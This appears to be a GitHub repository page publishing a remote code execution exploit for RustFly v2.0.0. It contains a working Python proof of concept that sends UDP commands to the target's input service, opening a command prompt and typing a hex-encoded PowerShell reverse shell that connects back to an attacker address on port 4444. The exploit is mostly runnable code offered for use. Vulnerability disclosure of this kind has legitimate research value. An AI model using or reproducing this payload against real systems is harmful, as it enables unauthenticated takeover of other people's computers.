Skip to content

capture0x/RustFly-RCE

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 

Repository files navigation

Exploit Title: RustFly v2.0.0 – Remote Code Execution (RCE)

Date: 2025-05-29
Exploit Author: tmrswrr
Software Link: https://bixat.dev/products/rustfly
Platform: Multiple Version: v2.0.0
Tested on: Windows 10

Vulnerability Description

RustFly v2.0.0 contains a critical vulnerability in its remote input processing layer that allows unauthenticated attackers to achieve remote code execution (RCE).

Using this flaw, an attacker can:

  • Inject a PowerShell TCP reverse shell payload
  • Gain full command execution access to the target system

Proof of Concept (PoC)

# PoC Author: tmrswrr

import socket
import time

target_ip = "192.168.1.109"
target_port = 5005

messages = [
    "6d6f76653a2d393939392c39393939",  # move:-9999,9999
    "646F75626C655F636C69636B",     # double_click
    "746578743A636D64",             # text:cmd
    "6B65793A656E746572",           # key:enter
  
"746578743A706F7765727368656C6C202D6E6F70202D63202224633D4E65772D4F626A6563742053797374656D2E4E65742E536F636B6574732E544350436C69656E7428273139322E3136382E312E313130272C34343434293B24733D24632E47657453747265616D28293B5B627974655B5D5D24623D302E2E36353533357C257B307D3B7768696C65282824693D24732E526561642824622C302C24622E4C656E6774682929202D6E652030297B3B24643D284E65772D4F626A656374202D547970654E616D652053797374656D2E546578742E4153434949456E636F64696E67292E476574537472696E672824622C302C2469293B24723D69657820246420323E26313B24732E577269746528284E65772D4F626A656374202D547970654E616D652053797374656D2E546578742E4153434949456E636F64696E67292E4765744279746573282472202B20275053203E2027292C302C282472202B20275053203E2027292E4C656E677468297D22",
    "6B65793A656E746572",           # key:enter
]
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("", 0))     
sock.settimeout(5)

try:
    for msg in messages:
        sock.sendto(bytes.fromhex(msg), (target_ip, target_port))
        print(f"[+] Sent: {bytes.fromhex(msg).decode('ascii', errors='ignore')}")
        time.sleep(1)

except socket.timeout:
    print("[-] Timeout.")

finally:
    sock.close()```

About

RustFly v2.0.0- Remote Code Execution (RCE)

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages